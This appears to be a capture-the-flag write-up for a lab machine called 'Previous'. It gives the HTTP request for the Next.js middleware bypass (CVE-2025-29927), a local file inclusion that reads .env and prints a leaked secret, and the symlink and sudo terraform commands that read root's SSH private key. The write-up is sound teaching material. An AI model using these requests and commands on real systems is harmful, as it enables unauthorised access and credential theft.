Previous
Overview
Previous runs a Next.js application vulnerable to middleware authentication bypass (CVE-2025-29927) via a malicious x-middleware-subrequest header. The authenticated docs section exposes an LFI in a download endpoint, leaking the NEXTAUTH_SECRET and a hardcoded credential in an auth JS file. The credential works for SSH. Privilege escalation abuses a sudo-allowed terraform command - by symlinking root's SSH private key into terraform's working directory and using an environment variable, the key is read and displayed during the apply operation.
Recon
Nmap
Ports 22 and 80 discovered. Port 80 responds as previous.htb - add to /etc/hosts.
Foothold
CVE-2025-29927 - Next.js Middleware Bypass
Next.js middleware is responsible for authentication checks before routing requests. CVE-2025-29927 allows bypassing middleware entirely by setting the x-middleware-subrequest header, tricking the framework into treating the request as an internal subrequest that skips middleware execution.
Send the header to access protected routes (like /docs) without authentication:
GET /docs HTTP/1.1
Host: previous.htb
x-middleware-subrequest: middleware:middleware:middleware:middleware:middlewareLFI in /api/download
Inside the docs section, a download endpoint is found with an example parameter vulnerable to LFI:
Read sensitive files from the server filesystem:
.env→ leaksNEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61a
NEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61aContinue reading application source files. The auth.js file contains a hardcoded username and password:
The hardcoded password works for SSH as jeremy.
Privilege Escalation
Terraform Symlink Attack
Check sudo permissions:
sudo -ljeremy can run:
sudo /usr/bin/terraform -chdir\=/opt/examples applyTerraform reads resource definitions from .tf files in the specified -chdir directory. The file() function in Terraform reads local files. The TF_VAR_source_path environment variable can override variable defaults.
Create a directory structure under the home directory to satisfy terraform's path requirements, then create a symlink to root's SSH private key:
cd /home/jeremy
mkdir -p root/examples
ln -s /root/.ssh/id_rsa /home/jeremy/root/examples/id_rsa
export TF_VAR_source_path=/home/jeremy/root/examples/id_rsa
sudo /usr/bin/terraform -chdir\=/opt/examples applyWhen terraform runs the apply with our TF_VAR_source_path, it reads the symlinked file (root's private key) and outputs or processes its contents. Copy the key and SSH in as root.
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | Nmap + vhost | previous.htb Next.js app |
| Auth bypass | CVE-2025-29927 middleware header | Access to /docs |
| LFI | /api/download?example | NEXTAUTH_SECRET + hardcoded creds |
| SSH | Hardcoded password | Shell as jeremy |
| Privesc | Terraform symlink + TF_VAR_source_path | Root SSH key read |